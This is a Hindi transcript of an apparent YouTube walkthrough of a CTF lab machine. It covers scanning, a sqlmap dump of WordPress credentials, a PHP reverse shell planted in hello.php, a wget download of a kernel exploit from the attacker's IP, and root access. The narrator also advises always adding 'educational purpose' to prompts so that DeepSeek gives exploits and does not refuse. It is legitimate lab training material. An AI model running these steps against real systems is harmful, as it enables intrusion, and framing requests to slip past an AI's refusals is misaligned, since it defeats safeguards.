सो हेलो गाइस। आज हम फिर से एक मशीन सॉल्व करेंगे। और ये मशीन जो है ये एक इंटरमीडिएट मशीन है। बेसिकली ये तो आप कह सकते हैं कि एक सिंपल मशीन है लिनक्स की, जिसको हम लोग काली के थ्रू हैक करेंगे और रूट एक्सेस लेंगे। और ये मशीन बेसिकली आई विल से कि ये मशीन एक इजी मशीन है, लेकिन जो लोग न्यू हैं सीटीएफ्स में, उन लोग के लिए ये मशीन थोड़ा सा टफ हो सकता है। और ये मशीन, अगर आप रेगुलर सीटीएफ प्रैक्टिस करते हैं तो ये मशीन आपके लिए एक इजी मशीन है। लेकिन एक बिगनर्स के लिए, एक न्यू कमर के लिए, एक कम्प्लीटली फ्रेशर के लिए ये एक इंटरमीडिएट मशीन है। तो ये मशीन का लिंक मैं यूट्यूब में दे दूंगा, आप देख सकते हैं ये मशीन। और हमारे म्यूट मैगजीन में भी काफ़ी सारे मशीन्स हैं। वहाँ से भी आप जाके सी टी एफ्स के काफ़ी सारे मशीन्स, बिगनर मशीन्स, इंटरमीडिएट मशीन्स भी देख सकते हैं वॉक थ्रू। और प्रैक्टिस कर सकते हैं सी टी एफ्स। अगर आपका एग्जाम ओ एस सी पी है या पी एन पी टी है तो आप प्रैक्टिस कर सकते हैं। तो जैसा कि ये मशीन मैंने डाउनलोड किया हुआ है, और इसको वर्चुअल बॉक्स में, वर्चुअल मशीन में, ये मशीन जो है बेसिकली वर्चुअल मशीन की मशीन में ही सेटअप होगा। वर्चुअल बॉक्स में ये मशीन यहाँ पर लिखा हुआ है कि VMware में ही सेटअप होगा। एक चीज़ हमेशा याद रखिए, जब भी आप किसी मशीन को इंस्टॉल डाउनलोड करें और उसको सेटअप करें अपने वर्चुअल बॉक्स में या वर्चुअल मशीन में, उसका डिस्क्रिप्शन ज़रूर पढ़ लें। कभी कभी क्या होता है ना कि कुछ हिंट यहाँ पर भी होता है। तो जैसा कि मैंने तो ऑलरेडी किया हुआ है, ये मेरी काली मशीन है और मैंने ये मशीन को सेटअप कर लिया है। तो आइए शुरू करते हैं हम लोग। सबसे पहले हम लोग पहले वही काम करेंगे, ARP स्कैन करके पहले हम लोग चेक करेंगे कि हमारे मशीन का IP क्या है। IP आ जाने के बाद हम nmap करेंगे, और nmap करने के बाद हम लोग चेक करेंगे कि इस मशीन में कौन कौन से पोर्ट ओपन है, क्या क्या सर्विसेज चल रहे हैं उसमें, उस पर्टिकुलर पोर्ट पे वर्नेबल है या नहीं है। और काफ़ी सारी चीज़ें, सारी इंफॉर्मेशन मिल जाती हैं। जैसे जैसे आप CTF प्रैक्टिस करेंगे, वॉक थ्रूज देखेंगे, तो आपको ना धीरे धीरे कुछ ना कुछ आइडिया हो जाएगा। और इसी तरह से काफ़ी सारी मशीन्स मैंने अपने यूट्यूब चैनल में भी डाला है, आप वहाँ से भी सारे मशीन्स देख सकते हैं। और धीरे धीरे डालूंगा। तो ये देखिए यहाँ बता रहा है कि इस 22 पोर्ट जो है वो SSH पोर्ट होता है, और पोर्ट 80 जो है वो खुला हुआ है। और यहाँ पर ज़्यादा कुछ डिस्क्रिप्शन तो मुझे नहीं दिख रहा है। अब पोर्ट 80 जो है वो खुला हुआ है। हमारा आईपी क्या था? हमारा आईपी था दिस। तो इस आईपी को खोलता हूँ, और खोलने के बाद मैं ब्राउज़र खोल के चेक करता हूँ ये साइट ओपन है या नहीं है, या कुछ और है। ओके, तो ये एक है, साइट है। तो चलो हम लोग डब ट्राई करते हैं। आप डब भी यूज़ कर सकते हो, DIR बस्टर भी यूज़ कर सकते हो, गो बस्टर यूज़ कर सकते हो, फॉरेक्स फेरोक्स बस्टर यूज़ कर सकते हो। और जिस तरह से आप कंफर्टेबल हो उस तरह से आप यूज़ कर सकते हो। तो हम यहाँ पर ये वाला मशीन, ये आईपी डाल के चेक करते हैं कि इस पर्टिकुलर आईपी के अंदर कोई फोल्डर है कि नहीं है, जो मुझे मदद कर सके आगे बढ़ने में। देखिए यहाँ पर PHP एडमिन, PHP माई एडमिन दिखा रहा है। इसमें क्लिक करूंगा, कंट्रोल दबा के क्लिक करूंगा तो ये पेज खुलेगा, मगर ये पेज खुला नहीं। ओके, इसको खोल के चेक करता हूँ, ये भी खुला नहीं। तो चलिए मैं वेबसाइट थोड़ा सा विजिट करता हूँ। देखिए यहाँ पर कुछ कुछ टारगेट, प्लीज गो टू योर टारगेट। तो देखिए एक फोल्डर मुझे यहाँ पर लिंक में मिला है। अब इस फोल्डर पे मैं डब चला के चेक करता हूँ कि इसके अंदर कुछ है या नहीं है। ओके, इसको बंद कर देते हैं और अब चेक करते हैं। तो फोल्डर के अंदर इस तरह से आपको चेक करना है डब से, या दूसरे किसी डायरेक्टरी ब्रूट फोर्सिंग टूल्स बहुत सारे होते हैं, जो कि हम लोग NPT में और WAPT में यूज़ करते हैं, ये जानने के लिए कि और क्या क्या कंटेंट है एक साइट के अंदर। देखिए इतना सारा कंटेंट, WP एडमिन, ये तो मुझे पता चल गया कि ये वर्डप्रेस का साइट है। WP दिखा रहा है, इसका मतलब कि वर्डप्रेस है। अब देखिए यहाँ पर WP एडमिन में अगर मैं क्लिक करूंगा तो ये पेज मेरा खुलेगा। देखता हूँ कैसे क्या है आता है। और कोई पेज है? WP एडमिन, WP दिस वन। ओके,
तो ये कोई पेज खुला है। ओके, ये पेज मेरा यहाँ पर आ गया। तो जब डुपी एडमिन से ये पेज मेरा खुला, लेकिन इसका यूजर आईडी पासवर्ड मुझे पता नहीं है। तो मैं एक काम ये करता हूँ, थोड़ा सा साइट को और थोड़ा सा देखिए, यहाँ पर लिखा हुआ है गेन एक्सेस टू द बॉक्स एंड रीड दिस फाइल इन रूट डायरेक्टरी, साइट एडमिन, साइट लॉगिन। थोड़ा सा साइट को, अगर आपका साइट है, थोड़ा सा उसको थोड़ा सा एक्सप्लोर कीजिए। एक्सप्लोर करने के बाद आपको कोई लिंक शायद मिल जाए। देखिए, ये मुझे एक लिंक मिला। अब हम लोग ये कर सकते हैं कि इस लिंक को LFI के लिए यूज़ कर सकते हैं, मतलब लोकल फाइल इंक्लूजन के लिए यूज़ कर सकते हैं। उसके बाद फिर हम इसमें कमांड इंजेक्शन यूज़ करके रिमोट शेल ले सकते हैं। या फिर ये सारे जो फाइल्स अब मुझे यहाँ ये जो दिख रहा है, इससे मैं एसक्यूएल, अच्छा ये भी यहीं पर आ गया ना। ओके, एसक्यूएल इंजेक्शन मैप यूज़ करके, एसक्यूएल मैप यूज़ करके, अब देखिए जैसे ही मैंने अनकैटेगराइज्ड को क्लिक किया तो मुझे एक यहाँ पर लिंक मिला। चलिए ट्राई करते हैं, कॉपी करते हैं इसको और एसक्यूएल मैप यूज़ करते हैं। अब देखिए यहाँ पर आपने दो टैब आपको दिख रहा होगा, तो ये न्यू न्यू टैब खोलने का प्रोसेस क्या है, कंट्रोल शिफ्ट टी दबाएंगे तो मेरा नया टैब फ्रेश खुल जाएगा। इससे क्या होगा ना कि मुझे डिफरेंट डिफरेंट टैब्स रहेंगे, डिफरेंट डिफरेंट टेस्टिंग के लिए। तो मुझे पता रहता है कि कौन सा टैब में क्या है, तो मैं डायरेक्ट टैब को चेक कर देता हूँ, कर लेता हूँ। वरना फिर क्या होता है ना कि अगर एक ही टैब में आप सारा चीज़ लिखते चले जाएंगे, सारा कमांड, तो स्क्रॉल करके ऊपर देखने में बहुत दिक्कत होती है। अब मैं यहाँ पर एसक्यूएल मैप लिखता हूँ और मैं यहाँ पर ये पेस्ट कर दिया। यहाँ मैं लिखता हूँ डॉट डॉट लेवल्स डॉट डीबीएस। ये क्या करेगा, लेवल 3 तक जाएगा। लेवल 3 का एक तरह समझिए कि वर्बोसिटी होता है। ओके, लेवल 3 तक चेक करेगा फोर्सफुल्ली। और डीबीएस अगर इस लिंक पे, अगर ये लिंक वर्नेबल है एसक्यूएल मैप पे, तो मुझे डेटाबेस लाके दिखाएगा। तो चलिए मैं ये कमांड लिखता हूँ। देखिए मुझे डेटाबेस यहाँ पर दिखा दिया, इंफॉर्मेशन स्कीमा, माई MS SQL और वर्डप्रेस। तो वर्डप्रेस मेरा एक डीबी डेटाबेस निकला। अब मैं क्या करूँगा, एसक्यूएल मैप लिखूंगा और यहाँ पर ये सारा चीज़ हटा दूंगा। यहाँ मैं लिखूंगा, अब जो कि मुझे डेटाबेस पता चल गया, तो मैं डैश कैपिटल D वर्डप्रेस लिखूंगा और लिखूंगा डैश डैश टेबल्स। तो ये क्या करेगा, पर्टिकुलर इस डेटाबेस से सारा टेबल्स मुझे निकाल के देगा। देखिए ये सारा टेबल्स मेरे पास आ गया पर्टिकुलर डेटाबेस का। अब मैं क्या करूंगा, अब देखिए यहाँ पर जो मेनली जो है वो है यूजर्स। ओके, तो यूजर्स जब है तो उसके यही सेम लिंक को मैं यूज करूंगा, -t डैश WP यूजर्स डॉट डंप। तो ये क्या करेगा, पर्टिकुलर इस डेटाबेस का, इस टेबल का सारा डेटा को डंप करेगा। अब मैं इंटर करता हूँ, लिंक वही है, एसक्यूएल मैप ही हम लोग यूज किया। अब देखिए यहाँ पर मैं यस कर देता हूँ, तो ये क्या करेगा ना कि सारा जो भी क्या रहेगा, डू यू वांट टू यूज कॉमन पासवर्ड फिक्स, यस कर देता हूँ, एंटर मारता। अब ये क्या कर रहा है ना कि सारा डेटाबेस, आप यहाँ पे आप चीज एक चीज देखेंगे कि ये सारे क्या है, पासवर्ड्स हैं। ओके, एडमिन है, ये सारे यूजर्स हैं शायद, और ये सारे पासवर्ड है। तो मुझे चेक कर लेना दीजिए, ये सारे, ये जो है ना वो हैश है। तो बेसिकली ये क्या कर रहा है, सारे हैशेस को डिक्रिप्ट कर रहा है और मुझे यूजर आईडी एंड पासवर्ड या और भी जो भी कुछ टेबल में होगा वो मुझे लाके यहाँ दिखाएगा। ये थोड़ा टाइम लेगा, तो मैं क्या करता हूँ कि वीडियो को थोड़ा पॉज करता हूँ, जैसे ही ये कंप्लीट होगा मैं वहां से रिज्यूम कर दूंगा। ओके, तो ये जो अब लगता है कि ये सारा चीज जो है वो आउटपुट आ गया है। अब मैं करूंगा ये, इसे सिर्फ डायरेक्ट कॉपी करूंगा, इसे डायरेक्ट कॉपी करके अब इसको सेग्रीगेट करना पड़ेगा। तो सेग्रीगेट करने के लिए मैं एक काम करता हूँ, डीपसीक का यूज़ कर लेता हूँ। डीपसीक मैंने खोला हुआ है। काइंडली सेट ऑल एज एक्सेल। अब देखता हूँ, ये मुझे सारा चीज़ जो है वो एक प्रॉपर फॉर्मेट में करके दे देगा। तो मुझे समझ में आ जाएगा कि मैं क्या, कौन सा यूज़र है। वैसे तो ये ऐसे भी देखने से समझ में आ ही जाएगा, लेकिन मैं यहाँ पर ये दिखाना चाह रहा हूँ बेसिकली कि हम लोग AI का यूज़ कैसे करेंगे। ओके, यहाँ नेटवर्क का इशू कुछ बता रहा है।
चलिए चेक करते हैं। आप देख सकते हैं यहाँ पर मुझे यूज़र आईडी पासवर्ड मिल चुका है। 1 2 3 4 5 यूज़र आईडी एंड पासवर्ड। तो इस तरह से अगर हम सेग्रीगेट कर लेते हैं, चलिए एक मिनट हम लोग थोड़ा सा यहाँ चलते हैं। जैसे कि पहला यूज़र जो है वो है जेम्स है। ओके, दूसरा यूज़र जो है वो स्मिथ है, तीसरा यूज़र है मिलर, चौथा यूज़र है ब्लैक, दिस, कोनर, बल्क, और इसका जो पासवर्ड है वो भी यहाँ पर होगा, देखिए। ठीक है, ये पासवर्ड पासवर्ड जो है वो बेसिकली हैश फॉर्म में है। तो अगर फॉर एग्जांपल अगर ये पासवर्ड नहीं दे पाया तो यूज़र पास, ओके यूज़र पास तो है, यू कैन सी इट हेयर कि यहाँ पर यूज़र आईडी सब है। ओके, इसको अगर नोटपैड में भी हम लोग निकाल सकते हैं, लेकिन पहले हम लोग चेक करते हैं कि ये डीपसीक निकाला हुआ कि नहीं हुआ। क्या बोल रहा है यार, चेक सेट इट ऑल टू एज एक्सेल फॉर्मेट। चेक करते हैं, इसी पूरा को फिर से कर देते हैं सेंड, इसको हटा देते हैं। हम लोग आगे चल के ये भी देखेंगे कि हम लोग एक्सप्लॉइट कैसे ढूंढते हैं इससे। अरे यार क्या हो गया इसको, एक सेकेंड, इसको रिफ्रेश करते हैं। ओके ओके, लगता है नेट का कोई इशू है। ओके, नेट तो चल रहा है, लेट मी चेक, एक बार फिर से करता हूँ। ओके, अब आप देख सकते हो कि ये थोड़ा थोड़ा सच के आ रहा है। इसमें से यूज़र पासवर्ड निकालने के लिए सेट इट एज एक्सेल शीट फॉर्मेट, एक बार चेक करते हैं। ये क्या करेगा, मुझे एक्सेल फॉर्मेट शीट में मुझे निकाल के देगा। ओके, ये बेसिकली दिखा रहा है। ओके, तो यूज़र पासवर्ड निकालने के लिए मुझे थोड़ा सा मेहनत करना पड़ेगा। जैसे कि एक काम करते हैं, इसको पूरा कॉपी करते हैं, 6 है। कॉपी करने के बाद एक नोटपैड खोलते हैं, न्यू नोटपैड खोलते हैं। ओके, सॉरी, एक नोटपैड खोलते हैं, इसको पेस्ट कर देते हैं। अब यहाँ मुझे एडमिन मिल गया, मुझे ये Q1W एक यूज़र मिल गया, नेपोलियन मिल गया, मैक्सवेल मिल गया और कर्नल मिल गया। अब पासवर्ड जो है वो है मेरे ख्याल से दिस है मैक्स निक मैक्स में। ओके, मेरे ख्याल से कर्नल का पासवर्ड ये है, मैक्सवेल का पासवर्ड है निकनेम, नेपोलियन है, इसका ये यूज़र है, और ये जॉर्ज मिलर पासवर्ड है, एडमिन है, निक जेम्स पासवर्ड है। ओके, तो हम लोग ये काम ये करते हैं कि इसको आगे चल के देखते हैं ये इससे कुछ लॉगिन होता है या नहीं। तो हम लोग ये काम ये करते हैं, इसको मेरा जो ये है इसमें हम लोग सबसे पहला जो उठाते हैं, वैसे तो मैंने सारा टेस्ट कर लिया, तो मैं बताऊंगा। दिस विल बी द यूज़र, ठीक है। इसे मैं कॉपी कर लेता हूँ और जो यूज़र है उसको मैं यहाँ डाल देता हूँ, और नोटपैड में हमने देखा कि ये मेरा पासवर्ड है। अब इस पासवर्ड को हम लोग यहाँ डाल देते हैं, अब देखते हैं इसे लॉगिन होता है कि नहीं होता है। ओके, रॉन्ग यूज़र आईडी एंड पासवर्ड बोल रहा है। अ, इसको यूज़र आईडी एंड पासवर्ड विल बी
जॉर्ज मिलर, जॉर्ज मिलर, इसको कॉपी करते हैं, एक बार चेक करते हैं। उल्टा करके देखते हैं, जॉर्ज मिलर यहाँ डाल देते हैं और इसको पासवर्ड की जगह डाल के चेक करते हैं। लेट मी सी, अब देखते हैं ये खुलता है या नहीं। ओके, तो आप लोगों ने देखा कि ये बेसिकली ये थोड़ा सा R&D करना पड़ेगा। ये यूज़र है या ये पासवर्ड है, या ये पासवर्ड है या ये यूज़र है, मैक्सवेल यूज़र है या पासवर्ड है, या कॉर्नर जो है वो यूज़र है, तो वो थोड़ा सा चेक करना पड़ेगा, थोड़ा सा R&D आप लोगों को करना पड़ेगा। अब जब ये चीज़ खुल गया मेरा, हम लोग क्या करेंगे, यहाँ पर ये सारा टैब्स है, हम लोग यहाँ पर देखेंगे। ओके, मैनेज, अब देखिए राइट के अंदर राइट पेज भी है, मैनेज, मैनेज के अंदर पेजेस है, कैटेगरीज है, और कमेंट है, कैटेगरीज है, लिंक के अंदर जाएंगे तो लिंक कैटेगरी है, इंपोर्ट है, ऐड लिंक है, प्रेजेंटेशन के अंदर थीम एडिटर है, थीम एडिटर, थीम एडिटर, प्लगइन्स, प्लगइन्स के अंदर प्लगइन्स एडिटर है, प्लगइन्स के अंदर प्लगइन्स एडिटर है, यूज़र के अंदर एडमिन यूज़र है, ऑप्शंस के अंदर राइट है, रीड है, डिस्कशंस है, ये है मिसलेनियस है, कहीं ना कहीं तो कुछ इसके अंदर होना चाहिए। ओके, अब देखिए मैनेज के अंदर एक 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 टैब है फाइल्स का। अब इस फाइल्स टैब के अंदर एक है, एक ऑलरेडी एक है hello डॉट php, और उसका लिंक देखिए इस पेज का मुझे यहाँ पर दिया हुआ है। तो हम लोग क्या करेंगे ना कि यहाँ पर जो भी एग्जिस्टिंग कोड हो रहा रहेगा, हम लोग क्या करेंगे कि PHP रिवर्स शेल यहाँ पर डाल देंगे। तो हम लोग ये काम ये करते हैं, PHP रिवर्स शेल गिटहब डालेंगे यहाँ पर, है ना, रिवर्स शेल। अब रिवर्स शेल जो मुझे मिलेगा यहाँ पर, SSH, नहीं नहीं नहीं, ये क्या खुल गया यार, गिटहब रिवर्स शेल, PHP रिवर्स शेल, पेंटेस्ट मंकी, दिस वन, पेंटेस्ट मंकी का ही सारा होता है इसमें। देखिए यहाँ पर PHP रिवर्स शेल है। अब इस कोड को, इस कोड, ये पूरे के पूरे कोड को, इस पूरे के पूरे कोड को हम लोग यहाँ से कॉपी करेंगे, कंट्रोल A, कंट्रोल C, और यहाँ पर पेस्ट कर देंगे। ओके, कंट्रोल A, कंट्रोल V। अब देखिए ये पूरा रिवर्स शेल यहाँ पर मेरा आ गया। अब हमको करना क्या है, यहाँ से सिर्फ आईपी चेंज करना है, यहाँ से आईपी चेंज करना है, अपना आईपी देना है, मतलब अटैकर मशीन का आईपी देना है, और पोर्ट देना। पोर्ट को तो मैं वैसे ही छोड़ देता हूँ। चलिए अब पता लगाते हैं कि हमारा आईपी क्या है। कंट्रोल शिफ्ट टैब मार के IF कॉन्फ़िग डालेंगे, और हमारा आईपी है दिस, अटैकर मशीन का। इसको कॉपी करके हम लोग यहाँ पर डाल देते हैं, और ये यहाँ पर आ गया। अब देखिए ये जो पेज है ये hello डॉट php है, इसे मैं यहाँ पर नीचे आके अपडेट कर देता हूँ, अपडेट फाइल। तो ये फाइल अपडेट होगी। अब अगर मैं एक काम ये करूँ कि इस फाइल, इस पाथ को कॉपी करूँ, कॉपी करने के बाद अगर मैं यहाँ पर इस पाथ को पेस्ट करके एंटर मारूं, तो ये एग्जीक्यूट होगा मेरा, सॉरी यहाँ पर नहीं होगा, यहाँ से होगा। यहाँ से तो मुझे मेरा PHP रिवर्स शेल एग्जीक्यूट होगा, और मुझे शेल मिल जाना चाहिए। तो मैं एक काम करता हूँ, क्लियर करते हैं, नेटकैट 1234 लिसनिंग चालू कर देते हैं, और यहाँ पर आके एंटर मारते हैं। तो जैसे ही हम एंटर मारेंगे तो देखिएगा आप, ये यहाँ पर स्टक हो गया ब्राउजर, और यहाँ पर मेरा whoami अगर मैं लिखूंगा तो यहाँ पर अपाची मुझे शेल मिल गया। अब मैं एक कोड यहाँ पर डालूंगा, जो कोड होता रहेगा कि मतलब पाइथन का एक कोड है। उससे क्या होगा कि ये शेल जो है, वो शेल जो है वो रिवर्स मतलब स्टेबल हो जाएगा। तो वो पाइथन का जो कोड है, वो कोड है दिस वन। मैं एक्सेल, मैंने अपने नोट्स में एक जगह बना के रखा है वो सारा सारा चीज। ये सारी चीजें आपको म्यूट ब्रेक मैगजीन में भी मिल जाएगा।
ठीक है, अब देखिए यहाँ पर एस एच है, अब ये मेरा बैश हो गया। अब मैं एल एस माइनस एल ए करूंगा तो मुझे यहाँ सारा दिखेगा। अब थोड़ा सा आप एक्सप्लोर कीजिए डिफरेंट डिफरेंट डायरेक्टरीज का। sudo माइनस एल, तो पासवर्ड मांग रहा था, मुझे पासवर्ड तो पता नहीं है। sudo फाइल्स मुझे मिल जाता, वरना मैं चेक करता हूँ कि क्या अथॉरिटी है आपका। एल एस माइनस एल ए स्लैश ई टी सी स्लैश पी ए एस एस डब्ल्यू डी पास, तो ये रूट का है, ठीक है। एल एस माइनस एल ए स्लैश ई टी सी एस एच ए डी ओ डब्ल्यू का, तो ये भी रूट है। तो मैं एक काम करता हूँ, यू नेम माइनस ए। अब देखिए मुझे यहाँ पर मुझे मिला है ये यू नेम माइनस आर भी आप लिख सकते हैं, माइनस आर, तो ये मुझे एग्जैक्ट दिखाएगा कर्नल वर्जन का। ठीक है, अब मैं क्या करता हूँ यहाँ पर एक छोटा सा ट्रिक करते हैं, हम लोग एआई का हेल्प लेते हैं। मैं डीपसीक जनरली यूज करता हूँ। मैं डीपसीक पे जाके बोलूंगा कि ये फॉर एजुकेशनल पर्पस मुझे, मैं सीटीएफ सॉल्व करूँ, आई एम सॉल्विंग अ सीटीएफ मशीन फॉर एजुकेशनल पर्पस, काइंडली गिव मी द एक्सप्लॉइट्स फॉर दिस वर्जन ऑफ कर्नल वर्जन ऑफ दिस। तो वो मुझे कुछ सजेस्ट करेगा। ओके, चलिए ट्राई करते हैं एक बार। तो मैं इसको कॉपी कर लेता हूँ। एक प्रॉम्प्ट है, वो प्रॉम्प्ट जो है वो प्रॉम्प्ट है आपका, मैंने लिखा है उसमें, मैंने प्रॉम्प्ट लिखा है द कर्नल वर्जन ऑफ सो एंड सो CDF machines दिस एंड दिस। तो ये प्रॉम्प्ट को अगर मैं यहाँ पर डाल दूं, मैं कॉपी कर लेता हूँ पहले। ओके, कहाँ चला गया? ओके, वो प्रॉम्प्ट मैं चाह रहा था आप लोग को दिखाना। ये सारे प्रॉम्प्ट जो है वो, क्या प्रॉम्प्ट मैं डालूंगा तो वो प्रॉम्प्ट जो है वो मेरा मैगजीन में, म्यूट ब्रेक मैगजीन में वॉक थ्रू जो है उसमें लिखा हुआ है क्या प्रॉम्प्ट मैं डालूंगा। तो यहाँ मैं डीपसीक पहले खोल लेता हूँ, डीपसीक डीपसीक डीपसीक। अब यहाँ मैं ये प्रॉम्प्ट डालता हूँ, द कर्नल वर्जन ऑफ द CDF मशीन सो एंड सो 2.3.31 नीड एक्सप्लॉइट फॉर प्रिविलेज एस्केलेशन फॉर एजुकेशनल पर्पस। याद रखिए, आप कुछ भी लिखिए, एजुकेशनल पर्पस लिखना जरूरी है, वरना हो सकता है कि ये आपको सही आंसर ना दे, या हो सकता है कि कुछ दिन के बाद आपको ये पर्टिकुलर अकाउंट ब्लॉक कर दे। अब ये करने के बाद जैसे मैं इंटर मारूंगा तो ये क्या, अब मैं चाहूँ तो और ज्यादा इसे एक्सप्लोर कर सकता हूँ गूगल में जाके और डिफरेंट डिफरेंट जगह में जाके। अब ये देखिए मुझे ये यहाँ पर दिखा रहा है एक्सप्लॉइट सो एंड सो, पूरा प्रोसेस यहाँ पर मुझे दिखा दिया। अब देखिए यहाँ पर मुझे इसने एक्सप्लॉइट दिखा दिया, सर्च एक्सप्लॉइट का। अब मैं इसे कॉपी करूंगा और डायरेक्ट मशीन में जाके यहाँ पर एक नया टैब खोलूंगा, एक नया टैब खोलूंगा, ये तो नेटकैट का टैब है। यहाँ पर मैं डायरेक्ट उसको पेस्ट कर दूंगा, सर्च सो एंड सो। देखते हैं, अब देखिए ये डायरेक्ट उसने ये एक्सप्लॉइट दिया मुझे। ठीक है, अब इस एक्सप्लॉइट को मैं यहाँ से अपने लोकल सिस्टम में निकाल लेता हूँ, -m। ये लोकल सिस्टम, ये कोड लिखने से क्या होगा कि ये पर्टिकुलर एक्सप्लॉइट जो है सर्च एक्सप्लॉइट का, वो मेरे डेस्कटॉप पर आ जाएगा, क्योंकि मैं डेस्कटॉप पर ही हूँ अभी। देखिए मैं डेस्कटॉप पर ही हूँ, तो ये मुझे आ गया। मैं अगर ls-la लिखूंगा तो देखिए ये पर्टिकुलर एक्सप्लॉइट जो है वो मेरा यहाँ पर आ गया डेस्कटॉप पे। ओके, अब इस एक्सप्लॉइट को मुझे भेजना है अपने विक्टिम मशीन पे। तो उसके लिए मैं क्या करूंगा, पाइथन का सर्वर पहले चालू करूंगा, कहाँ पर, डेस्कटॉप पर ही। तो मैंने पाइथन का सर्वर चालू किया, पोर्ट 8000 पे चालू किया। अब चालू करने के बाद मैं यहाँ पर अपने नेटकैट शेल में जाऊंगा और यहाँ पर लिखूंगा cd/temp। ओके, अब मैं यहाँ लिखूंगा wget/http 192.168.32.135। ये मेरा जो आईपी है, ये मेरा अटैकर का आईपी है, मतलब मेरा लोकल मशीन का आईपी है। पोर्ट दे दूंगा मैं यहाँ पर ये 8000 स्लैश, क्या था उसका नाम, फाइल का नाम क्या था, 152815285.c से कॉपी कर लेते हैं, बेस्ट तो सही रहेगा। कॉपी कर लिए और यहाँ पर इसको मैं कंट्रोल शिफ्ट डी दबाऊंगा और एंटर करूंगा। अब देखिए ये कॉपी होगी मेरा, ls-la करूंगा तो ये फाइल जो है वो मेरा यहाँ पर आ गया। अब इस फाइल को मैं क्या करता हूँ, जीसीसी करके, जीसीसी कंट्रोल शिफ्ट -o, मैं इसे सी हटा देता हूँ। तो ये क्या लिख रहा है, जीसीसी ये कंपाइल करेगा दिस एक्सप्लॉइट को, आउटपुट जो देगा वो 15285 में देगा। डॉट सी मैंने हटा दिया, कोई ये नहीं है, सॉरी।
ठीक है, एंटर कर दिए, कुछ एरर नहीं आया, इसका मतलब ये काम शायद करना चाहिए, एरर नहीं आया, मतलब 15285 अगर मैं एंटर करता हूँ तो देखिए कुछ हुआ, होने के बाद कुछ हो रहा है, एसएच में आ गया, गेट गॉट रूट, गॉट रूट मतलब वी आर रूट। अब मैं हु एम आई अगर लिखता हूँ तो यहाँ पर दिखाता है रूट। अब मैं cd/root पे जाऊंगा, ls करके ls लिखूंगा तो यहाँ पर मुझे key.txt दिख रहा है, और देखिए यहाँ बैकग्राउंड में भी मुझे यही लिखा हुआ था। ठीक है, तो मैं अगर यहाँ पर लिखता हूँ cat key.txt और इंटर करते हैं तो मुझे यहाँ पर दिखता है यस यू मस्ट बी प्राउड बिकॉज यू गॉट द पासवर्ड टू कंप्लीट द फर्स्ट रियलिस्टिक हैकडेमिक चैलेंज। और ये मैंने रूट बन गया, और रूट का जो की है वो मैंने निकाल लिया इसमें से। तो आप देखेंगे कि ये मशीन जो है तो इजी मशीन, लेकिन अगर आप प्रैक्टिस में है CTF का तो बहुत इजीली आप इस मशीन को सॉल्व कर सकते हैं सिंपल तरीके से। और मेरा कोशिश यही रहता है कि सिंपल से सिंपल तरीके से जितने भी मशीन्स हैं उन सबको सॉर्ट आउट करके उसका एक वॉक थ्रू बनाऊं, और लोगों को, और जो लोग पेन टेस्टिंग में, NPT में, एथिकल हैकिंग में, WAPT में और CTF में आगे बढ़ना चाहते हैं और प्रैक्टिस करते हैं और इंटरेस्ट रखते हैं, उन लोगों को हेल्प हो सके। तो आप लोगों ने देखा कि कितने आसान तरीके से हम लोगों ने इस मशीन को सॉल्व किया, पार्ट बाय पार्ट। पहले हम लोगों ने वेब एन्यूमरेशन किया, उसके बाद फिर हम लोगों ने SQL मैप से पासवर्ड निकाला, उसके बाद फिर हम लोगों ने लॉगिन किया वर्डप्रेस के साइट को, और ऐसा पेज ढूंढा जो कि एग्जीक्यूटेबल हो सके आउटसाइड द, मतलब बाहर से कोई भी उसको ऐसा पेज जो हर कोई एग्जीक्यूट कर सके, उस पेज के कोड को ही चेंज कर दिया और उसको एग्जीक्यूट करा के रिवर्स शेल ले लिया। रिवर्स शेल लेने के बाद हम लोगों ने कर्नल वर्जन निकाला, और कर्नल वर्जन को डायरेक्टली हम लोगों ने डीप सीक से मतलब क्वेश्चन किया कि इस वर्जन का हम लोगों को एक्सप्लॉइट दो। उसने एग्जैक्ट एक्सप्लॉइट भी दे दिया और कुछ कुछ स्टेप्स भी बताया। तो बेसिकली इसी तरह से और एडवांस प्रोसेस से कैसे हम लोग AI का यूज ले सकते हैं किसी भी मशीन को सॉल्व करने के लिए, वो आने वाले धीरे धीरे वॉक थ्रू वीडियोस में मैं डिस्क्राइब करता जाऊंगा। और आप चाहें तो ये सारी चीज़ें खुद भी सीख सकते हैं। आप चाहें तो हमारा एक इंटर्नशिप प्रोग्राम है, hackproofacademy.in में विजिट करें। hackproofacademy.in में जाके इंटर्नशिप प्रोग्राम को में एनरोल करें और जानें कि ये जो डोमेन है कितना इंटरेस्टिंग डोमेन है, और इस डोमेन को मतलब इस डोमेन के ऊपर आप काम करके एक सर्टिफाइड एथिकल हैकर पेन टेस्टर कैसे बन सकते हैं, क्या इंटरेस्टिंग चीज़ें हैं। वैसे तो ये काफ़ी इंटरेस्टिंग चीज़ है, और अगर ज़्यादा आपको CTF में जानना है तो आप हमारे वीडियो ब्रेक मैगजीन में भी विजिट कर सकते हैं। और इसी तरह के डिफरेंट डिफरेंट बहुत सारे वीडियोस मैं रेगुलरली लाता रहूँगा। तो मैं अब क्लोज करता हूँ इस वीडियो को। आप मेरा चैनल अगर फर्स्ट टाइम देख रहे हैं तो काइंडली सब्सक्राइब कीजिएगा, और कुछ कमेंट कीजिए, कुछ एडवाइस कीजिए कि मुझे और क्या करना चाहिए, कैसे करना चाहिए। ओके, थैंक यू गाइस, थैंक यू वेरी मच।